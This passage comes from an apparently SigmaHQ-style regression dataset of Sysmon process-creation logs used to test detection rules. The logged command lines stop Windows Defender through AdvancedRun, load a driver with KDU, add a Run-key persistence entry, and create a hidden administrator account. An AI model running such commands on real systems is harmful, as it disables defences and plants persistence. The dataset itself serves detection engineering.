\"NirSoft\",\n      \"OriginalFileName\": \"AdvancedRun.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\AdvancedRun.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096\",\n      \"ParentProcessGuid\": \"14207D89-91E9-68F9-E104-000000003F02\",\n      \"ParentProcessId\": 452,\n      \"ParentImage\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"ParentCommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml",
    "content": "id: 5f4db274-e3e6-45cd-a5a3-ef03f678dd28\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: d2b749ee-4225-417e-b20e-a8d2193cbb84\n      title: PUA - AdvancedRun Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T10:19:13.088214Z\"\n        }\n      },\n      \"EventRecordID\": 650834,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 10:19:13.085\",\n      \"ProcessGuid\": \"14207D89-0121-68FA-6E11-000000003F02\",\n      \"ProcessId\": 6448,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\AdvancedRun.exe\",\n      \"FileVersion\": \"1.51\",\n      \"Description\": \"Run a program with different settings that you choose.\",\n      \"Product\": \"AdvancedRun\",\n      \"Company\": \"NirSoft\",\n      \"OriginalFileName\": \"AdvancedRun.exe\",\n      \"CommandLine\": \"AdvancedRun.exe  /EXEFilename \\\"C:\\\\Windows\\\\System32\\\\sc.exe\\\" /WindowState 0 /CommandLine \\\"stop WinDefend\\\" /StartDirectory \\\"\\\" /RunAs 8 /Run\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096\",\n      \"ParentProcessGuid\": \"14207D89-00ED-68FA-6611-000000003F02\",\n      \"ParentProcessId\": 700,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml",
    "content": "id: 0f52b7ec-72e4-4362-acf5-b5558ff58323\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: fa00b701-44c6-4679-994d-5a18afa8a707\n      title: PUA - AdvancedRun Suspicious Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/e76ca062-4de0-4d79-8d90-160a0d335eca.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-23T04:01:30.178887Z\"\n        }\n      },\n      \"EventRecordID\": 23388,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-01-23 04:01:30.177\",\n      \"ProcessGuid\": \"0197231E-F29A-6972-6716-000000000800\",\n      \"ProcessId\": 12200,\n      \"Image\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\kdu.exe\",\n      \"FileVersion\": \"1.1.1.2105\",\n      \"Description\": \"Kernel Driver Utility\",\n      \"Product\": \"KDU\",\n      \"Company\": \"UG North\",\n      \"OriginalFileName\": \"Hamakaze.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\xodih\\\\Downloads\\\\kdu.exe\\\"  -prv 1 -map MyDriver.sys\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=8ED32ACE2FBCE50296D3A1A16D963BA7,SHA256=5A08ECB2FAD5D5C701B4EC42BD0FAB7B7B4616673B2D8FBD76557203C5340A0F,IMPHASH=404E2902C47CF33EE0616252BFBCF67B\",\n      \"ParentProcessGuid\": \"0197231E-F25A-6972-5F16-000000000800\",\n      \"ParentProcessId\": 13764,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/info.yml",
    "content": "id: 199a332f-7017-4afa-81a4-407fb5cc345d\ndescription: N/A\ndate: 2026-01-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: e76ca062-4de0-4d79-8d90-160a0d335eca\n      title: PUA - Kernel Driver Utility (KDU) Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/e76ca062-4de0-4d79-8d90-160a0d335eca.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:35:26.043284Z\"\n        }\n      },\n      \"EventRecordID\": 256890,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:35:26.041\",\n      \"ProcessGuid\": \"5AB40FD1-400E-68F9-6331-000000003B02\",\n      \"ProcessId\": 6032,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"REG   ADD \\\"HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /V \\\"softoz\\\" /t REG_SZ /F /D \\\"C:\\\\Users\\\\admin\\\\AppData\\\\Roaming\\\\sihostt.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml",
    "content": "id: e60e5322-dc51-4969-be3b-12caad8a9276\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: de587dce-915e-4218-aac4-835ca6af6f70\n      title: Potential Persistence Attempt Via Run Keys Using Reg.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:38:06.571958Z\"\n        }\n      },\n      \"EventRecordID\": 256915,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:38:06.570\",\n      \"ProcessGuid\": \"5AB40FD1-40AE-68F9-7631-000000003B02\",\n      \"ProcessId\": 2456,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg  copy hklm\\\\system\\\\CurrentControlSet\\\\services\\\\acpi hklm\\\\system\\\\CurrentControlSet\\\\control\\\\safeboot\\\\network\\\\nas /s /f\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml",
    "content": "id: 6f781d8b-1b6c-408b-a90d-08aceb2a14d0\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: d7662ff6-9e97-4596-a61d-9839e32dee8d\n      title: Add SafeBoot Keys Via Reg Utility\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/c43a5405-e8e1-4221-9ac9-dbe3fa14e886.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-19T16:11:39.281042Z\"\n        }\n      },\n      \"EventRecordID\": 553,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 5928,\n          \"ThreadID\": 9720\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"DESKTOP-54JCEU5\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-01-19 16:11:39.278\",\n      \"ProcessGuid\": \"34E9093F-57BB-696E-7001-000000000300\",\n      \"ProcessId\": 4392,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.19041.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg  query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Nls\\\\Language\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\marco\\\\\",\n      \"User\": \"DESKTOP-54JCEU5\\\\marco\",\n      \"LogonGuid\": \"34E9093F-54FA-696E-7C2B-070000000000\",\n      \"LogonId\": \"0x72b7c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\",\n      \"ParentProcessGuid\": \"34E9093F-57AD-696E-6E01-000000000300\",\n      \"ParentProcessId\": 12188,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"DESKTOP-54JCEU5\\\\marco\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/info.yml",
    "content": "id: 70cc76fe-3470-48ad-b15f-5714ad17a5c6\ndescription: N/A\ndate: 2026-01-19\nauthor: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\nrule_metadata:\n    - id: c43a5405-e8e1-4221-9ac9-dbe3fa14e886\n      title: System Language Discovery via Reg.Exe\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/c43a5405-e8e1-4221-9ac9-dbe3fa14e886.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-31T05:06:45.367278Z\"\n        }\n      },\n      \"EventRecordID\": 657153,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3080,\n          \"ThreadID\": 4948\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-31 05:06:45.364\",\n      \"ProcessGuid\": \"14207D89-43E5-6904-4506-000000004002\",\n      \"ProcessId\": 5244,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"REG  ADD \\\"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist\\\" /v AtomicOperator$ /t REG_DWORD /d 0\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-34DD-6904-8287-190000000000\",\n      \"LogonId\": \"0x198782\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860\",\n      \"ParentProcessGuid\": \"14207D89-43E5-6904-4106-000000004002\",\n      \"ParentProcessId\": 6656,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"cmd.exe\\\" /c NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never  & REG ADD \\\"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist\\\" /v AtomicOperator$ /t REG_DWORD /d 0\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml",
    "content": "id: de8dc72e-19eb-465a-83ac-59545ae56426\ndescription: N/A\ndate: 2025-10-31\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9ec9fb1b-e059-4489-9642-f270c207923d\n      title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:26:58.441823Z\"\n        }\n      },\n      \"EventRecordID\": 256793,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:26:58.421\",\n      \"ProcessGuid\": \"5AB40FD1-3E12-68F9-1A31-000000003B02\",\n      \"ProcessId\": 6856,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-AdFind.exe\",\n      \"FileVersion\": \"1.52.0.5064\",\n      \"Description\": \"-\",\n      \"Product\": \"AdFind\",\n      \"Company\": \"www.joeware.net\",\n      \"OriginalFileName\": \"AdFind.exe\",\n      \"CommandLine\": \"renamed-AdFind.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=12011C44955FD6631113F68A99447515,SHA256=C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3,IMPHASH=12CE1C0F3F5837ECC18A3782408FA975\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/info.yml",
    "content": "id: 09eb713e-f4b1-42ce-9c8e-d446ba0d548a\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: df55196f-f105-44d3-a675-e9dfb6cc2f2b\n      title: Renamed AdFind Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:29:25.275782Z\"\n        }\n      },\n      \"EventRecordID\": 256823,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:29:25.272\",\n      \"ProcessGuid\": \"5AB40FD1-3EA5-68F9-2F31-000000003B02\",\n      \"ProcessId\": 4564,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-netsh.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Network Command Shell\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"netsh.exe\",\n      \"CommandLine\": \"renamed-netsh.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 